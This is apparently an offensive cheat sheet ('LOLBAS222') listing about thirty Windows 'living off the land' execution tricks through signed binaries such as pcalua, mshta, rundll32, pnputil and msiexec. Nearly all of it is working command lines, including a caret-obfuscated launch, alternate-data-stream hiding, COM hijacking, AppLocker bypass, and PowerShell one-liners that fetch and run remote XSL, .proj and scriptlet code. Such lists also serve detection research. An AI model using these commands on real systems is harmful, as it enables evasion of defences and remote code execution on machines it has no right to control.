/LOLBAS222

APT || Execution || Launch || APTs || ( Authors harr0ey, bohops )

####################### | # | APT # | # #######################

( 1 ) Use Pcalua

p^c^a^l^u^a^ ^-^n^ ^-^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a calc.exe

( 2 ) Alternate Data Streams ADS:>

cmd.exe:> type C:\Users\Gihad\Desktop\file.bat > C:\Users\Gihad\Desktop\test.txt:x22x2
cmd.exe:> netsh exec C:\Users\Gihad\Desktop\test.txt:x22x2

( 3 ) pnputil.exe Launcher .INF:> Note This Eveything here .INF Work on My Script INFscript Only !

pnputil.exe /add-driver C:\FilesINFExecution.inf /install

&- My Code INFScript Injection Command Line 
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 4 ) INFDefaultInstall Launch Execute INFScript

INFDefaultInstall.exe C:\INFPS.inf
&-  Code INFScript 
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 5 ) setupapi.dll Launch Execute My INFScript

setupapi.dll,InstallHinfSection DefaultInstall 132 C:\INFPS.inf
&-  Code INFScript 
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 6 ) DLL Execution Using ( Reflection ) In CPLEx AccessibilityCPL RegServer

&- Add Values in HKLM Name File ms-settings in Open/Shell/Command
&- rundll32 accessibilitycpl.dll,DllRegisterServer 
&- rundll32 shell32.dll,Control_RunDLL "C:\Windows\tem32\desk.cpl"

( 7 ) Language LUA in Files .wlua

wlua.exe C:\testing.wlua
&- Hello World Exe My Code LUA
https://gist.githubusercontent.com/homjxi0e/bbd218dea9bf63fd36524b9777a399f3/raw/888f7e484651fdb733d6261ca002d684a6e5bf9b/Test.wlua

( 8 ) SCT ScriptLet Execution in My INFScript

rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 C:\INFPS.inf
&- Raw Code 
https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415

( 9 ) Jscript Execute Code Via ( Eval,VSA,)

[Reflection.Assembly]::LoadWithPartialName('Microsoft.JSCript')
$attack = 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("notepad.exe")'
[Microsoft.JScript.Eval]::JScriptEvaluate($attack,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())
&- Code Execute
https://gist.githubusercontent.com/homjxi0e/0d683007bd4a3ce39d3e19342aaa68ec/raw/4c8709382280de158b99dd78f91875e32a54bac4/ATPSJScript

( 10 ) MSI Launch Execution ( MsiExec.exe )

 msiexec.exe /passive /i C:\testing.msi /norestart 
 &- File MSI Hello World Exe in .MSI 

( 10v1 ) COM Component object Model Hijacking

&- Add Reg in System 
https://gist.githubusercontent.com/homjxi0e/8e42aa716361dc41b1c45a314bea501c/raw/327104671eebad1361210524f34076503e6b8e44/COM-hijacking.reg
&- You can now Execution invoke-CLSID Via xwizard.exe
xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}

( 10v2 ) Execute VBScript Via mshta.exe

&- Execute VBScript Code using mshta.exe
mshta.exe VBScript:Close(Execute("Set S=CreateObject(""WScript.Shell""):If S.AppActivate(""maybe-Run"")=False Then:S.Run(""C:\Windows\system32\Calc.exe""):End If"))
https://gist.githubusercontent.com/homjxi0e/eb16d75f3db6d6081648f2c5c5c98c3b/raw/0870f7553095dcf6519f93c1cf72c6415468140b/VBSExC

( 10v3 ) forfiles.exe Execution Endless

forfiles.exe /c calc.exe

( 10v4 ) Powershell Scriptlet COM Object Hijacking via System.Activator

$COMobj = [activator]::CreateInstance([type]::GetTypeFromCLSID("{00020000-0000-0000-C000-000000000046}"));$COMobj.Exec();
https://gist.github.com/homjxi0e/40f30c3be62c6ef152d6f6fffa9dba3c

( 10v5 ) ScriptRunner.exe Execution

ScriptRunner.exe -appvscript C:\Windows\System32\calc.exe

( 10v6 ) msdt.exe Execute EXE-MSI Via Reader XML wtih Launch by Pcwrun.exe

 msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
 &- link file PCW8E57.xml
 https://gist.github.com/homjxi0e/3f35212db81b9375b7906031a40c6d87

( 10v7 ) Launch MSI Pacakge Execution Powershell

install-Package C:\test.msi
https://github.com/homjxi0e/MSIScript/blob/master/Exec-Execute.msi

( 10v8 ) DLL Execute CML Launch Application

rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication calc.exe

( 10v9 ) HTA/MSI Execute Using OpenWith.exe

Whitelisting SRP Bypassing Using OpenWith.exe To Launch HTA/MSI Execution 
&- OpenWith.exe /c C:\test.hta 
&- OpenWith.exe /c C:\testing.msi

( 10v11 ) XrML Digital License (.xrm-ms) ActiveX

iexplorer C:\test.xrm-ms 
https://gist.github.com/homjxi0e/099d8f35f3b2e1b7daa7cbe366df1ed3
 

( 10v12 )

start C:\obj.url
https://gist.github.com/homjxi0e/0023a9cb5d4fee198019f87bd348effc

( 10 v13 ) ActiveX executing using a SVG Document

iexplorer C:\PoC.svg
https://gist.github.com/homjxi0e/4a38b2402e77a536a4deb17928f9a8b0

(10v14) Dxcap.exe Abuse

Dxcap.exe -c C:\Windows\System32\notepad.exe    

(Note) Product Via @bohops ( 11 ) HTA Launch Execution ( url.dll )

Rundll32.exe url.dll,OpenURL FileHTA Or Anything 

( 12 ) SCT Launch Execution InSide INFScript ( ieadvpack.dll )

rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1, 

( 13 ) XML Launch Execution Via Reflection,Assembly Powershell

[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build');
$proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/caseysmithrc/8e58d11bc99e496a19424fbe5a99175f/raw/38256d70b414f6678005366efc86009c562948c6/xslt2.proj")
$e=new-object Microsoft.Build.Evaluation.Project($proj); 
$e.build();

( 14 ) CSharp Launch Execution Via Reflection.Assembly Powershell

[Reflection.Assembly]::LoadWithPartialName('http://Microsoft.Build '); $e=new-object http://Microsoft.Build.Evaluation.Project('evil.csproj'); $e.Build();

( 15 ) SCT Execution Via INFScript By ( advpack.dll )

rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,

( 16 ) XML Launch Execution Via Reader XML,Transform Object Powershell

$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

( 17 ) SCT Launch Execution Reflection.Assembly Via ( Microsoft.VisualBasic )

 [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct …').Exec(0)

( 18 ) SCT Launch Execution Reflection.Assembly Via ( Microsoft.JScript )

[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct …").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())

( 19 ) Commandline APT Launch Execution Applocker/Bypassing Via ( CL_LoadAssembly )

import-module C:\windows\diagnostics\system\AERO\CL_LoadAssembly.ps1
LoadAssemblyFromPath C:\Windows\System32\calc.exe

( 20 ) HTA Launch Execution Via ( shdocvw.dll )

rundll32.exe shdocvw.dll, OpenURL <path to local URL file>

( 21 ) HTA Launch Execution Via ( ieframe.dll )

rundll32.exe ieframe.dll, OpenURL <path to local URL file>

( 22 ) Commandline Execute Via Vshadow.exe

 Vshadow exec calc.exe

( 23 ) CSharp Execution Via ProjectInstance RA Powershell

[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build')
$p="c:\test\test.csproj"
$e=new-object Microsoft.Build.Execution.ProjectInstance($p)
$e.build()